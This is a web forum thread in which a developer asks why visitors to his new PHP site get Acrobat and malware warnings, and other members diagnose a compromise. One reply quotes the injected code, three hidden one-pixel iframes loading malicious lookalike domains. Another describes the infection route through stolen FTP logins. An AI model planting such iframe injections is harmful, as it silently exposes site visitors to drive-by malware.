Hello and welcome to our community! Is this your first visit?
Register
Enjoy an ad free experience by logging in. Not a member yet? Register.
Results 1 to 7 of 7
  1. #1
    Senior Coder
    Join Date
    Jun 2008
    Location
    New Jersey
    Posts
    2,530
    Thanks
    45
    Thanked 259 Times in 256 Posts

    Site keeps trying to open Acrobat

    I was hoping someone with web security knowledge might be able to help me. I've just developed a site and I'm running into a major security problem.

    Basically, when people go through my site, it keeps giving them PDF errors. The issue is I don't have any PDFs on the site at all. Its causing a possible malware error to come up in Safari and complaints on Firefox. So far no problem on IE though.

    I was hoping someone might be able to help me out.

    http://bitballot.com

  • #2
    Supreme Master coder! _Aerospace_Eng_'s Avatar
    Join Date
    Dec 2004
    Location
    In a place far, far away...
    Posts
    19,291
    Thanks
    2
    Thanked 1,043 Times in 1,019 Posts
    You have this stuff on the bottom of your code on your site
    Code:
    <iframe src="http://goooogleadsence.biz/?click=31C8B0" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://google-ana1yticz.com/?click=8D375E" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://xtrarobotz.com/?click=183E796" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
    I'm guessing you didn't put it there. It looks like nonsense. Contact your host, change your passwords to your control panel, and ftp.

    Also are you using any kind of server side language like php?
    ||||If you are getting paid to do a job, don't ask for help on it!||||

  • #3
    Senior Coder
    Join Date
    Jun 2008
    Location
    New Jersey
    Posts
    2,530
    Thanks
    45
    Thanked 259 Times in 256 Posts
    I'm using PHP atm.

    Thanks for noticing that, tomorrow morning I'll go through and prune all the pages to make sure its not on any more. However, unfortunately other pages I just checked on has the problem.

    http://bitballot.com/admin/login and once you've logged in the first page.

    If you don't mind lending me some help, pm me and I'll send you the login info (I don't wanna put it publicly as I'm not sure if it'll get spidered and then suddenly things go to hell).

  • #4
    Supreme Master coder! _Aerospace_Eng_'s Avatar
    Join Date
    Dec 2004
    Location
    In a place far, far away...
    Posts
    19,291
    Thanks
    2
    Thanked 1,043 Times in 1,019 Posts
    You could just post your php code.
    ||||If you are getting paid to do a job, don't ask for help on it!||||

  • #5
    Senior Coder
    Join Date
    Jun 2008
    Location
    New Jersey
    Posts
    2,530
    Thanks
    45
    Thanked 259 Times in 256 Posts
    It's happening on multiple pages... and its a lot of code.

  • #6
    Supreme Master coder! _Aerospace_Eng_'s Avatar
    Join Date
    Dec 2004
    Location
    In a place far, far away...
    Posts
    19,291
    Thanks
    2
    Thanked 1,043 Times in 1,019 Posts
    Download all of your files, delete the code if its there, if its not in the files that you download then its an issue with your host. Again change your passwords, and usernames. I still recommend contacting your host. Maybe there have been other reports so they know it might be an issue on there end.
    ||||If you are getting paid to do a job, don't ask for help on it!||||

  • #7
    New to the CF scene
    Join Date
    Apr 2009
    Posts
    1
    Thanks
    0
    Thanked 0 Times in 0 Posts
    From what I understand of this particular nasty , it uses a hole in
    the adobe acrobat viewer to work it's way to getting ftp logins
    to web sites and then uses those to put the nifty iframe hack in there
    so as to catch more people with the crud at xtrarobotz.com

    So simply cleaning up your site of the code will be fruitless
    if the little bugger that is stealing your passwords still lives in you PC.

    Heres one reference I found of many
    http://www.sulumitsretsambew.org/ifr...chinesguidecn/

    --Doc


  •  

    Posting Permissions

    • You may not post new threads
    • You may not post replies
    • You may not post attachments
    • You may not edit your posts
    •